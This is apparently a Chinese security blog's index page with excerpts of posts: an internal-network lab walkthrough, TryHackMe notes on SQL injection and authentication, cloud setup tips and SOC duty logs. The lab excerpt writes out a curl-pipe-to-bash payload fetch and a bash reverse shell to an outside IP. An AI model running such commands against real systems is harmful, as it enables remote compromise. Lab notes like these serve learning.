【学习笔记】基础:Puff Pastry练习(内网基础靶场)
靶场拓扑搭建的时候struts2一直起不来,算了,基本都起来了,少打一个点,主要是练习一下包含内网渗透最基础的做法和思路 外网打点模拟,拿到的只有一个ip扫端口吧,直接fscanweb服务是个shiro框架的站,密钥都爆破出来了,那直接工具梭了flag1开个监听然后弹shell,直接弹失败了,内存马传一个静态文件是cdn的啊,换种方式,直接下马 1curl -sSL http://192.168.111.131:8081/server.sh | bash 没反应页面回显了脚本源码看了下当前目录没这个脚本,应该是权限问题 1curl -sSL http://192.168.111.128:8081/server.sh -o /tmp/server.sh 1chmod +x /tmp/server.sh 然后再运行就弹过来了,看来是不支持执行多条命令下个fscan扫下内网 多路输出shell本地建立个多路shell的脚本 1echo 'bash -i >& /dev/tcp/120.27.131.154/404 0>&1 & bash...
笔记7---解决阿里云搭建的灯塔访问不了的问题
阿里云搭建灯塔,全放通了却访问不了提工单解决了,说是转发下就行 1sudo iptables -t nat -I PREROUTING -p tcp --dport 5003 -m state --state NEW -j ACCEPT 不得不说,阿里云的工单太好用了
笔记6---自定义阿里云系统镜像
阿里云镜像上传首先,vmware导出ovf然后下载qemu,将导出的文件中的vmdk文件制作成RAW文件 1./qemu-img.exe convert -f vmdk -O raw ../hack-disk1.vmdk ../hack.raw 然后上传就行了
博客恢复
格盘忘记备份笔记了如题,没备份,那咋办嘛,数据恢复工具也没扫出来,只能说是格的非常干净了想到有个静态存储库,想着用工具恢复看看 写了个恢复的小工具网上确实有个工具,但是是七年前写的,太辣了,根本用不了,就拷打cursor写了个,恢复的效果还不错恢复后的文章基本保留了我原有的Front-matte就是时间啥的可能有点问题,毕竟主要是根据静态存储库恢复的 嗯稍微研究下了配置项之前为了文章排序的问题,是自己改了主题渲染模板以及写了个js脚本辅助,date: 2025-04-01 16:00:00 updated: 2025-08-14 categories: 学习 tags: - 日常随记 --- # updated判断 在hexo目录下创建脚本文件`scripts/custom-i 这记录了,但刚恢复,不想那么麻烦,研究了下配置项,发现。。。。。。本来就有的,设置为updated就行md还是要写插件,要不然就会出现updated的值相同,但是date的值在更早的文章会排在上面,还是要用到date: 2025-04-01 16:00:00 updated:...
[THM]Web Application Pentesting---Injection Attacks 注入攻击
高阶 SQL 注入二次注入原理用户提供的输入被保存并随后在应用程序的不同部分使用,可能在一些初始处理之后。这种类型的攻击更加隐蔽,因为恶意 SQL 代码不需要立即导致 SQL 语法错误或其他明显问题,这使得它更难使用标准输入验证技术进行检测。当数据被检索并在 SQL 命令中使用时,第二次使用数据时,会发生注入 说白了,举个例子,有个更新数据的功能点,你之前添加的那一条数据项是恶意的sql语句,在执行这个功能后,他会被检索并当作正常sql语句执行,从而导致注入攻击 实践将所有书籍的标题更新为 “compromised”首先就是有个插入数据的网页先插个数据看看,显示了新插入的数据然后有一个更新数据的网页点击更新的数据包是这样这里看不出啥,从代码层面来分析就是 1234567if ( isset($_POST['update'])) { $unique_id = $_POST['update']; $ssn = $_POST['ssn_' . $unique_id]; $new_book_name...
[THM]Web Application Pentesting---Authentication 认证
基础sessioncookie属性Secure - 向浏览器指示 Cookie 只能通过经过验证的 HTTPS 通道传输。如果存在证书错误或使用 HTTP,则不会传输 Cookie 值HTTPOnly - 向浏览器指示客户端 JavaScript 可能无法读取 Cookie 值Expire - 向浏览器指示 Cookie 值何时不再有效,应将其删除SameSite - 向浏览器指示是否可以在跨站点请求中传输 Cookie,以帮助防止 CSRF 攻击 tokenToken-Based Session Management最常见的令牌类型之一是 JSON Web 令牌 (JWT),一般形式 1Authorization: Bearer <token> 以前的盲点浏览器中不仅仅要注意cookie,还要注意本地存储的 JWT它没有使用浏览器的自动 cookie 管理功能,而是依赖于客户端代码来完成该过程。身份验证后,Web 应用程序会在请求正文中提供令牌。然后使用客户端 JavaScript 代码,此令牌将存储在浏览器的 LocalStorage...
值守4
今天被强留了,反正都是公司报销,没事 byd红队124.220.92.207这小伙从10:02开始给我刷了九百多条告警啊,就一分钟没看,很快奥想着蛮溯源下,扫了下他,有开个80放博客,结果刚要访问就不通了,再一看,ping都ping不通,关机的很快奥又来了一个124.222.100.215,从10:53开始扫的后续又发现了俩,都是统一归属地。。。。。。。。。。嗯感觉是同个人用了代理池这样。。。md又来了一个。。。。后续看了下,有三千多条告警
值守3
偶遇四川小伙漏扫47.109.202.49小伙一开始就爬虫 123456GET /api/jeecg-boot/ HTTP/1.1 Host: ip User-Agent: WebCopier v4.6 Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close 经典的WebCopier,后续就是典型的漏扫了
[src]马上消费src基本信息
资产范围(一)核心产品: 影响绝大多数马上消费用户的核心产品功能(列表持续更新): 安逸花APP 马上金融APP 优逸花APP (以上APP基于所有的Android、IOS、鸿蒙版本) 1 | msxf.com —|— 4. 马上消费官网(www.msxf.com) 1 | www.msxf.com —|— 5. 安逸花官网(anyihua.msxf.com) 1 | anyihua.msxf.com —|—**(二)重点产品:包含绝大部分马上消费旗下产品和业务,包括但不限于移动应用、客户端、小程序、Web站点、服务器服务等产品模式。(三)其他产品:马上消费旗下其他业务产生的移动应用、客户端、小程序、Web...
值守2
一堆感觉是误报的告警,但是互联网ip嗯都是第三方设备发过来的,也看不到具体数据包,无法研判 夜间的扫描器啊一开始还以为误报,习惯性的点开一看,md扫描器啊终于让我逮到一个,可惜没啥用




![[THM]Web Application Pentesting---Injection Attacks 注入攻击](/img/c1/4.webp)
![[THM]Web Application Pentesting---Authentication 认证](/img/c1/3.webp)


